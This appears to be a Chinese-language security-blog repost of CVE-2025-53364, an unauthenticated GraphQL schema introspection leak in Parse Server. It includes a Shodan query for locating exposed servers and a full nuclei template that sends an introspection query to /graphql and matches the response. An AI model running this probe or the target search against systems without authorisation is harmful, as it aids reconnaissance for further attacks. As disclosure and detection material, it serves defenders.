Parse Server GraphQL Schema Information Disclosure Vulnerability

漏洞信息

漏洞名称: Parse Server GraphQL Schema Information Disclosure Vulnerability

漏洞编号:

  • CVE: CVE-2025-53364

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: Parse Server是一款开源的后端服务器框架,支持多种平台,广泛用于移动应用和Web应用的后端服务开发。它提供了GraphQL API接口,便于开发者进行数据查询和操作。该漏洞存在于Parse Server的GraphQL API中,允许未经认证的用户访问GraphQL schema信息,从而泄露应用程序的结构和可能的敏感信息。这种信息泄露漏洞的根源在于GraphQL schema的introspection功能未正确实施访问控制,导致攻击者无需会话令牌或主密钥即可获取schema元数据。这可能导致攻击者利用泄露的信息进一步扩大攻击面,例如通过分析schema结构发现其他潜在的安全漏洞。虽然该漏洞本身不直接导致远程代码执行或数据篡改,但它为后续攻击提供了有价值的信息,增加了系统的安全风险。修复建议包括在生产环境中禁用GraphQL schema的introspection功能,或为schema访问实施适当的认证控制。

产品厂商: parseplatform

产品名称: parse-server

影响版本: *

搜索语法: http.title:”Parse Server” || “parse-server”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8315c04dc3f06dd06e06140766b1d61b8525eac0/http%2Fcves%2F2025%2FCVE-2025-53364.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    Parse Server contains a GraphQL schema information disclosure vulnerability. The GraphQL API allows public access to the schema without requiring a session token or the master key, potentially exposing metadata that could expand the attack surface.
  impact: |
    An attacker can retrieve GraphQL schema metadata without authentication, potentially revealing application structure and expanding the attack surface for subsequent attacks.
  remediation: |
    Disable GraphQL schema introspection in production environments or implement proper authentication controls for schema access.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-53364
    cwe-id: CWE-200
    cpe: cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
    shodan-query: 'http.title:"Parse Server" || "parse-server"'
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://parseplatform.org
  tags: cve,cve2025,parse,parseplatform,graphql,info-disclosure
  
http:
  - method: POST
    path:
      - "{{BaseURL}}/graphql"

    headers:
      X-Parse-Application-Id: test
      Content-Type: application/json
    body: '{"query":"{\n  __schema {\n    types {\n      name\n    }\n  }\n}"}'
    
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data":{"__schema":{"types":[{"name":"Upload"},'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
Parse Server GraphQL Schema Information Disclosure Vulnerability
http://example.com/2025/07/23/github_1146975275/
作者
lianccc
发布于
2025年7月23日
许可协议